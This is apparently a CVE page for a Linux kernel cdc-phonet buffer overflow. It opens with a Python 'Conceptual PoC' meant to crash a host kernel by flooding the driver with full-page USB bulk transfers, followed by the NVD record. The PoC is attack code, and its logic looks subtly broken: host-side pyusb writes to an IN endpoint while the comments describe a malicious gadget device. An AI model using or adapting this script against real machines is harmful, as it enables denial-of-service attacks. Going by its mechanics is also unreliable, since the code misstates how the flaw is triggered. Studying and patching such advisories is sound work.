CVE-2026-31623

import usb.core import usb.util import time # Conceptual PoC for CVE-2026-31623 # This script simulates a malicious USB device sending bulk transfers # to trigger the skb frags overflow in the host's cdc-phonet driver. def send_malicious_bulk_transfers(): # Find the target USB device (Assuming gadget mode setup) # Vendor and Product IDs would depend on the specific malicious device setup dev = usb.core.find(idVendor=0x04b3, idProduct=0x4010) if dev is None: raise ValueError('Device not found') dev.set_configuration() cfg = dev.get_active_configuration() intf = cfg[(0, 0)] # Find the Bulk IN endpoint ep_in = usb.util.find_descriptor( intf, custom_match=lambda e: usb.util.endpoint_direction(e.bEndpointAddress) == usb.util.ENDPOINT_IN ) if ep_in is None: raise ValueError('Could not find Bulk IN endpoint') PAGE_SIZE = 4096 # Standard page size # Send more fragments than MAX_SKB_FRAGS (usually 17-18) to cause overflow NUM_FRAGS = 100 payload = b'A' * PAGE_SIZE print(f"Starting attack: Sending {NUM_FRAGS} full-page transfers...") try: for i in range(NUM_FRAGS): # Write full page data to the host bytes_written = ep_in.write(payload, timeout=1000) print(f"Sent fragment {i+1}/{NUM_FRAGS} ({bytes_written} bytes)") time.sleep(0.005) # Small delay to allow processing print("Payload transmission complete. Host kernel should panic or crash.") except usb.core.USBError as e: print(f"USB Error occurred: {e}") except Exception as e: print(f"Unexpected error: {e}") if __name__ == '__main__': send_malicious_bulk_transfers()

{"cve": {"id": "CVE-2026-31623", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:41.587", "lastModified": "2026-04-28T14:17:26.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: cdc-phonet: fix skb frags[] overflow in rx_complete()\n\nA malicious USB device claiming to be a CDC Phonet modem can overflow\nthe skb_shared_info->frags[] array by sending an unbounded sequence of\nfull-page bulk transfers.\n\nDrop the skb and increment the length error when the frag limit is\nreached. This matches the same fix that commit f0813bcd2d9d (\"net:\nwwan: t7xx: fix potential skb->frags overflow in RX path\") did for the\nt7xx driver."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.31", "versionEndExcluding": "6.6.136", "matchCriteriaId": "F537DD4C-1540-41DE-85CB-6B14F7030A5F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/600dc40554dc5ad1e6f3af51f700228033f43ea7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9989938d13cc5ba8447eeed5a61acfcf61bc6801", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a23b1b1aaf41e174181d5853a70e65d4d01e648c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c183d5775129a0a7495bd61a6e57ec230dcf01e5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d4e1946bea8d6441835eb3fd09b19237ba366a6f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ebf75c6301c4972a87542ebf2d994c6391eb5d46", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}